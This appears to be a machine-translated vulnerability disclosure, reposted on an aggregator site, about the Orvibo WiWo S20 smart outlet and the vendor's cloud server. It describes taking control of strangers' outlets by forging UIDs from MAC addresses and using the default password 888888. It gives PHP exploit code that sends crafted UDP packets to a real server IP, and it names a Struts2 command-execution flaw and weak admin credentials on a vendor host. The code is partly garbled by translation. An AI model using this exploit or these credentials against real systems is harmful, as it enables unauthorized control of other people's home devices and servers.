Smart Home can remotely control devices of other people's homes.

Source: Internet
Author: User

Smart Home can remotely control devices of other people's homes.

I like your design and admire the magic design of smart config,
But it's a little worse.

Oribo WiWo s20 smart Outlet




Protocol Analysis:

Control Switch
 









Uid = MAC + 0x202020202020

MAC address scan BSSID





Between Different CIDR blocks:

Attacker (counterfeit UID + default password 888888)-> cloud server

Cloud server> attacker (two UDP response packets)

Attacker (UDP operation code)-> cloud server

Cloud server (UDP operation code)-> Control Device





You only need to know the mac address and password of other people (most of them are default, do not believe the following) to control others' devices.

Code:



<? Php

$ Fp = fsockopen ('udp: // 42.121.111.208 ', 10000 );

$ Send = pack ('H * ', 'xxxxxxxx36caccf2108bc4202020202020383838383820202020202020 ');

Fwrite ($ fp, $ send );

$ Recv = fread ($ fp, 8192 );

$ Send = pack ('H * ', '686400176463accf21_bc420202020206b0000000000 ');

$ Send [18] = $ recv [18];

$ Send [22] = $ recv [23] = chr (0 )? Chr (1): chr (0 );

Fwrite ($ fp, $ send );

$ Recv = fread ($ fp, 8192 );





The combination of cloud vulnerabilities becomes terrible .........



Http://vicenter.orvibo.com: 20001/struts2 Command Execution ah



Weak administrator password. usernames are both 123456 and 123456.





So
 



Remote debug...


 







No mac address yet

Don't worry
 





I'm talking about weak passwords.

383838383838 hex 888888



You can locally send commands to the cloud for the cloud to forward to devices.

You can also directly send commands to devices on the cloud.



Of course, there are still a lot of firmware. Your infrared code and other firmware are leaked.




 

 

 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.